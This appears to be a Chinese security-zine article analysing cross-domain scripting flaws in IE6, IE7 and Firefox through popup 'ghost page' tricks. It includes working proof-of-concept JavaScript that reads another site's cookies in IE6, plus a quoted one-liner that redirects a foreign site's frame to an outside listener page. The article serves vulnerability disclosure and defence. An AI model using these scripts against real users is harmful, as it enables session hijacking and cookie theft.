==Ph4nt0m Security Team== Issue 0x02, Phile #0x04 of 0x0A |=---------------------------------------------------------------------------=| |=-----------------------=[ 浅析浏览器的跨域安全问题 ]=----------------------=| |=---------------------------------------------------------------------------=| |=---------------------------------------------------------------------------=| |=-----------------------=[ By rayh4c ]=----------------------=| |=----------------------=[ <rayh4c_at_80sec.com> ]=---------------------=| |=---------------------------------------------------------------------------=| Manuel Caballero大牛在这次的BLUEHAT大会上讲了一个叫A Resident in My Domain 的议题,字面上的意思就是驻留在自己的域,随后开始有牛人在自己BLOG上写了一些相关的 内容,这段时间一直和HI群里的朋友在讨论这个问题,大家都简称为鬼页,这个鬼页非常神奇, 可以跟随你浏览的每个页面。经过鬼页的启发,我也对浏览器的跨域安全问题进行了测试。 1.来自伪协议的呼唤 JAVASCRIPT里大家都频繁使用window对象,window对象代表的就是浏览器的窗口,我们 就来测试下window对象的open方法,尝试让新开的窗口执行伪协议。 在本机搭建一个WEB服务器,开始做下实验: 用各个浏览器浏览 http://127.0.0.1/test.htm ,下面是test.htm的脚本内容: <script> x=window.open("about:blank"); x.location="javascript:alert(document.domain)" </script> 结果是: IE6:执行了伪协议,认为弹出窗口的域是127.0.0.1。 IE7:执行了伪协议,认为弹出窗口的域是127.0.0.1。 Firefox:执行了伪协议,认为还没有域为NULL。 Firefox这里对于这个接口可能也有个BUG,对于IP地址的弹窗Firefox没有辨认出域,但 是在实际绑定域名的情况下还是辨认出了域。 为了下面的部分方便理解,我把这里弹窗的关系给简称下,原来的窗口叫父页,弹出窗口 叫子页,实验过后我们证明了: 父页和子页都在同一个域里,父页可以重定向子页的URL地址,甚至执行伪协议。 2.父页和子页的关系 如果父页让子页访问其他域后,父页和子页是否就脱离关系了呢? 继续测试,用各个浏览器浏览 http://127.0.0.1/test2.htm ,下面是test2.htm的脚本 内容: <script> x=window.open("about:blank"); x.location="http://www.163.com" //访问163网站 setTimeout(function(){ x.location="http://127.0.0.1"; },5000) //5秒后重定向到127.0.0.1 </script> 这次IE6、IE7、Firefox都达成了一致,实验的结果是子页访问了163网站,5秒然后又跳 回了127.0.0.1。 所以就算是子页在访问了其他域后,还是会受父页的控制。 3.域与域之间的牵绊 如果父页让子页访问某个域后,再执行伪协议会有什么效果? 用各个浏览器浏览 http://127.0.0.1/test3.htm,下面是test3.htm的脚本内容: <script> x=window.open("about:blank"); x.location="http://www.163.com" setTimeout(function(){ x.location="javascript:alert(document.cookie)"; },5000) </script> 结果是: IE6:没有反应。 IE7:报错,拒绝访问。 Firefox:报错,alert没有定义。 这些信息明显的说明,如果子页和父页不在同一个域里,浏览器是不允许父页控制子页 执行伪协议脚本的。 为了进一步验证,我们让子页打开同一个域里的页面测试: 用各个浏览器浏览 http://127.0.0.1/test4.htm,下面是test4.htm的脚本内容: <script> document.cookie="xss:true" //给本域设置一个COOKIE为xss:true x=window.open("about:blank"); x.location="http://127.0.0.1" setTimeout(function(){ x.location="javascript:alert(document.cookie)"; },5000) </script> 结果IE6、IE7、Firefox都顺利的弹出了COOKIE值,说明如果子页和父页在同一个域里, 浏览器是允许父页控制子页执行伪协议脚本的。 4.安全上的差异 父页和子页这种微妙的关系,到这里就开始引发安全问题了,PDP等大牛在分析鬼页的时 候给出了EXP: javascript:x=open("http://hackademix.net/");setInterval(function(){try{x.frames[0].location={toString:function(){return "http://www.sirdarckcat.net/caballero-listener.html";}}}catch(e){}},5000);void(1); EXP按上面三部分的概念解释是: 父页是A域,父页指定子页访问B域内一个带框架的页面,父页就能够控制B域页面内框架 的URL地址,这个就是典型的跨域操作了。 鬼页能够跨域操作框架的关键是window.frames[0]方法没有受到域的限制,第二个是让 location指定的地址看起来像个对象而不是参数。 我们按照鬼页的思路,继续在第3部分的基础上测试下去,将location指定的地址使用 new String()对象处理。 用各个浏览器浏览 http://127.0.0.1/test5.htm,下面是test5.htm的脚本内容: <script> x=window.open("about:blank"); x.location="http://www.163.com"; setTimeout(function(){ x.location=new String("javascript:alert(document.cookie)") },5000) </script> IE6:弹出COOKIE。 IE7:报错,拒绝访问。 Firefox:报错,alert没有定义。 结果是IE6奇迹般的弹出了COOKIE,我们做到了跨域执行脚本。 5.灾难性的后果 到这里我们发现了一个IE6的0DAY,一定程度上这个跨域安全问题是灾难性的,如下面的 EXP: <a href="">IE6 Cross Domain Scripting</a> <script> function win(){ x=window.open("http://www.phpwind.net"); setTimeout(function(){ x.location=new String("javascript:alert(document.cookie)") },3000) } window.onload=function(){ for (i=0;i<document.links.length;i++) { document.links[i].href="javascript:win()" } } </script> 点击链接后,马上得到了PHPWIND论坛的COOKIE,这就意味着黑客通过类似的攻击可以得 到你访问过的任意网站的COOKIE,然后劫持你的会话。 这样的漏洞相当于一个没有域限制的XSS漏洞,几乎是无法防御的,网站只能进一步的加 强客户端的会话安全,如使用SSL加密连接、设置安全COOKIE加上HTTPONLY参数、给敏感的 请求操作加上水印等。 6.总结 这个跨域安全问题的本质是浏览器在处理window对象的操作有所疏漏,没有考虑清楚不 同域有继承关系的window对象操作后的变化,只是对window对象的一些方法的参数做了类似 数据类型的限制,导致最后绕过限制跨域执行了脚本。 从这个漏洞我们也可以看出IE7的一些新的安全特性,通过继承关系的window对象操作 来跨域执行脚本伪协议最后是判断了域的,IE7已经开始防范类似的攻击。 但是这里并没有在本质上解决跨域安全问题,IE7只防范了跨域执行脚本,对于其他跨域 的操作仍然是放行的,所以鬼页在IE7下可以跨域操作框架URL,而Firefox却没有存在相同的 问题,说明不同浏览器在安全的考虑上也是存在很多差异的。 针对IE我又测试了其他对象方法,发现很多都被限制住了,但不排除还有同样的问题存 在。按照类似的思路,大家可以继续尝试挖掘浏览器的一些跨域漏洞。 最后感谢HI群里共同讨论的朋友。 7.参考 [1] Browser"s Ghost Busters: http://sirdarckcat.blogspot.com/2008/05/browsers-ghost-busters.html [2] Ghost Busters: http://www.gnucitizen.org/blog/ghost-busters/ -EOF-